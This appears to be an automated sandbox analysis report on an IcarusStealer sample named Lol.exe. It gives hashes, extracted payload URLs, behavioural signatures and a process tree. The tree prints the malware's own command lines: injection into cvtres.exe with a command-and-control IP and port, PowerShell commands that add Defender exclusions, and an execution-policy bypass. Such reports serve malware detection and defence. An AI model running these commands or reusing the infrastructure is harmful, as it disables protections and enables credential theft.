Analysis
- max time kernel: 55s
- max time network: 150s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64 arch:x86 image:win7-20240221-en locale:en-us os:windows7-x64 system
- submitted: 08/03/2024, 21:02
Static task: static1
Behavioral task: behavioral1
- Sample: Lol.exe
- Resource: win7-20240221-en
Behavioral task: behavioral2
- Sample: Lol.exe
- Resource: win10v2004-20240226-en
General
- Target: Lol.exe
- Size: 494KB
- MD5: 02d13710a5a788759319df4d64b95c17
- SHA1: 166121845fb2f40cc9febc35dea432696e388bec
- SHA256: 5422c44ddaea8b411bd457cd24c33c1c1fa8eed02dbdb35338da412f2be1dd33
- SHA512: 0a0a9c7ef30d0d3e71141684e796cfc78eb9d4689e37ae6d66123dfdd8a12df55dd424c47cd1d75068c6b8ff16512da2d607b69a6bc6cbcfba01b8063311171c
- SSDEEP: 12288:zhGwluLut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+QY:VBZ6N6LqQzJqk/
Malware Config
Extracted: icarusstealer
- payload_url:
  - https://blackhatsec.org/add.jpg
  - https://blackhatsec.org/remove.jpg
Signatures
IcarusStealer
Icarus is a modular stealer written in C#. It was first advertised in July 2022.

Modifies Installed Components in the registry 2 TTPs 1 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe
Executes dropped EXE 1 IoCs
pid | Process
2884 | SMSHoists.exe
Loads dropped DLL 1 IoCs
pid | Process
2152 | cmd.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
4 | ipinfo.io
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 2104 set thread context of 3052 | 2104 | Lol.exe | 30
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe

Modifies Internet Explorer settings
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | explorer.exe
Modifies registry class 5 IoCs
description | ioc | Process
Set value (data) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | explorer.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_Classes\Local Settings | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | explorer.exe
Suspicious behavior: EnumeratesProcesses 45 IoCs
pid Process 240 powershell.exe 2960 powershell.exe 1652 powershell.exe 3052 cvtres.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2848 chrome.exe 2848 chrome.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe 2884 SMSHoists.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | Process
2064 | explorer.exe
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeShutdownPrivilege 2064 explorer.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeDebugPrivilege 3052 cvtres.exe Token: SeDebugPrivilege 240 powershell.exe Token: SeDebugPrivilege 2960 powershell.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeShutdownPrivilege 2064 explorer.exe Token: SeDebugPrivilege 1652 powershell.exe Token: SeDebugPrivilege 2884 SMSHoists.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe Token: SeShutdownPrivilege 2848 chrome.exe -
Suspicious use of FindShellTrayWindow 60 IoCs
pid Process 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe -
Suspicious use of SendNotifyMessage 49 IoCs
pid Process 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2064 explorer.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe 2848 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2104 wrote to memory of 2064 2104 Lol.exe 29 PID 2104 wrote to memory of 2064 2104 Lol.exe 29 PID 2104 wrote to memory of 2064 2104 Lol.exe 29 PID 2104 wrote to memory of 2064 2104 Lol.exe 29 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2104 wrote to memory of 3052 2104 Lol.exe 30 PID 2064 wrote to memory of 2568 2064 explorer.exe 31 PID 2064 wrote to memory of 2568 2064 explorer.exe 31 PID 2064 wrote to memory of 2568 2064 explorer.exe 31 PID 3052 wrote to memory of 2512 3052 cvtres.exe 32 PID 3052 wrote to memory of 2512 3052 cvtres.exe 32 PID 3052 wrote to memory of 2512 3052 cvtres.exe 32 PID 3052 wrote to memory of 2512 3052 cvtres.exe 32 PID 3052 wrote to memory of 2956 3052 cvtres.exe 34 PID 3052 wrote to memory of 2956 3052 cvtres.exe 34 PID 3052 wrote to memory of 2956 3052 cvtres.exe 34 PID 3052 wrote to memory of 2956 3052 cvtres.exe 34 PID 2956 wrote to memory of 240 2956 cmd.exe 37 PID 2956 wrote to memory of 240 2956 cmd.exe 37 PID 2956 wrote to memory of 240 2956 cmd.exe 37 PID 2956 wrote to memory of 240 2956 cmd.exe 37 PID 2512 wrote to memory of 2960 2512 cmd.exe 36 PID 2512 wrote to memory of 2960 2512 cmd.exe 36 PID 2512 wrote to memory of 2960 2512 cmd.exe 36 PID 2512 wrote to memory of 2960 2512 cmd.exe 36 PID 3052 wrote to memory of 2120 3052 cvtres.exe 39 PID 3052 wrote to memory of 2120 3052 cvtres.exe 39 PID 3052 wrote to memory of 2120 3052 cvtres.exe 39 PID 3052 wrote to memory of 2120 3052 cvtres.exe 39 PID 2120 wrote to memory of 1652 2120 cmd.exe 41 PID 2120 wrote to memory of 1652 2120 cmd.exe 41 PID 2120 wrote to memory of 1652 2120 cmd.exe 41 PID 
2120 wrote to memory of 1652 2120 cmd.exe 41 PID 1652 wrote to memory of 2300 1652 powershell.exe 42 PID 1652 wrote to memory of 2300 1652 powershell.exe 42 PID 1652 wrote to memory of 2300 1652 powershell.exe 42 PID 1652 wrote to memory of 2300 1652 powershell.exe 42 PID 2300 wrote to memory of 1144 2300 csc.exe 43 PID 2300 wrote to memory of 1144 2300 csc.exe 43 PID 2300 wrote to memory of 1144 2300 csc.exe 43 PID 2300 wrote to memory of 1144 2300 csc.exe 43 PID 3052 wrote to memory of 2392 3052 cvtres.exe 44 PID 3052 wrote to memory of 2392 3052 cvtres.exe 44 PID 3052 wrote to memory of 2392 3052 cvtres.exe 44 PID 3052 wrote to memory of 2392 3052 cvtres.exe 44 PID 2392 wrote to memory of 740 2392 csc.exe 45 PID 2392 wrote to memory of 740 2392 csc.exe 45 PID 2392 wrote to memory of 740 2392 csc.exe 45 PID 2392 wrote to memory of 740 2392 csc.exe 45 PID 3052 wrote to memory of 2152 3052 cvtres.exe 46 PID 3052 wrote to memory of 2152 3052 cvtres.exe 46 PID 3052 wrote to memory of 2152 3052 cvtres.exe 46 PID 3052 wrote to memory of 2152 3052 cvtres.exe 46 PID 2152 wrote to memory of 2884 2152 cmd.exe 48 PID 2152 wrote to memory of 2884 2152 cmd.exe 48 PID 2152 wrote to memory of 2884 2152 cmd.exe 48 PID 2152 wrote to memory of 2884 2152 cmd.exe 48 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Level 1: C:\Users\Admin\AppData\Local\Temp\Lol.exe
cmdline: "C:\Users\Admin\AppData\Local\Temp\Lol.exe"
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID: 2104

  Level 2: C:\Windows\explorer.exe
  cmdline: "C:\Windows\explorer.exe"
  - Modifies Installed Components in the registry
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID: 2064

    Level 3: C:\Windows\system32\ctfmon.exe
    cmdline: ctfmon.exe
    PID: 2568

    Level 3: C:\Program Files\Google\Chrome\Application\chrome.exe
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe"
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID: 2848

      Level 4: C:\Program Files\Google\Chrome\Application\chrome.exe
      cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2be9758,0x7fef2be9768,0x7fef2be9778
      PID: 2352

      Level 4: C:\Program Files\Google\Chrome\Application\chrome.exe
      cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1096 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:2
      PID: 1684

      Level 4: C:\Program Files\Google\Chrome\Application\chrome.exe
      cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:8
      PID: 2304

      Level 4: C:\Program Files\Google\Chrome\Application\chrome.exe
      cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:8
      PID: 1284

      Level 4: C:\Program Files\Google\Chrome\Application\chrome.exe
      cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1508 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:1
      PID: 2932

      Level 4: C:\Program Files\Google\Chrome\Application\chrome.exe
      cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2208 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:1
      PID: 3000

      Level 4: C:\Program Files\Google\Chrome\Application\chrome.exe
      cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1404 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:2
      PID: 2836

      Level 4: C:\Program Files\Google\Chrome\Application\chrome.exe
      cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2912 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:1
      PID: 1636

      Level 4: C:\Program Files\Google\Chrome\Application\chrome.exe
      cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3528 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:8
      PID: 1536

  Level 2: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 147.185.221.17 22817 vUiuCXqqM
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 3052

    Level 3: C:\Windows\SysWOW64\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
    - Suspicious use of WriteProcessMemory
    PID: 2512

      Level 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2960

    Level 3: C:\Windows\SysWOW64\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
    - Suspicious use of WriteProcessMemory
    PID: 2956

      Level 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 240

    Level 3: C:\Windows\SysWOW64\cmd.exe
    cmdline: "cmd.exe" /c powershell -ep Bypass C:\Users\Admin\AppData\Local\Temp\rescale.ps1
    - Suspicious use of WriteProcessMemory
    PID: 2120

      Level 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell -ep Bypass C:\Users\Admin\AppData\Local\Temp\rescale.ps1
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 1652

        Level 5: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tk3xlwcg.cmdline"
        - Suspicious use of WriteProcessMemory
        PID: 2300

          Level 6: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F10.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7F0F.tmp"
          PID: 1144

    Level 3: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zn4wkeoe\zn4wkeoe.cmdline"
    - Suspicious use of WriteProcessMemory
    PID: 2392

      Level 4: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA479.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEEC8F2D35ADF4DE88FDAC032FE13CFB9.TMP"
      PID: 740

    Level 3: C:\Windows\SysWOW64\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\SMSHoists.exe & exit
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID: 2152

      Level 4: C:\Users\Admin\AppData\Local\Temp\SMSHoists.exe
      cmdline: C:\Users\Admin\AppData\Local\Temp\SMSHoists.exe
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2884

    Level 3: C:\Windows\SysWOW64\explorer.exe
    cmdline: "C:\Windows\System32\explorer.exe"
    PID: 1904

    Level 3: C:\Windows\SysWOW64\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe"
    PID: 2604

Level 1: C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
cmdline: "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
PID: 2272
Network
MITRE ATT&CK Enterprise v15
Downloads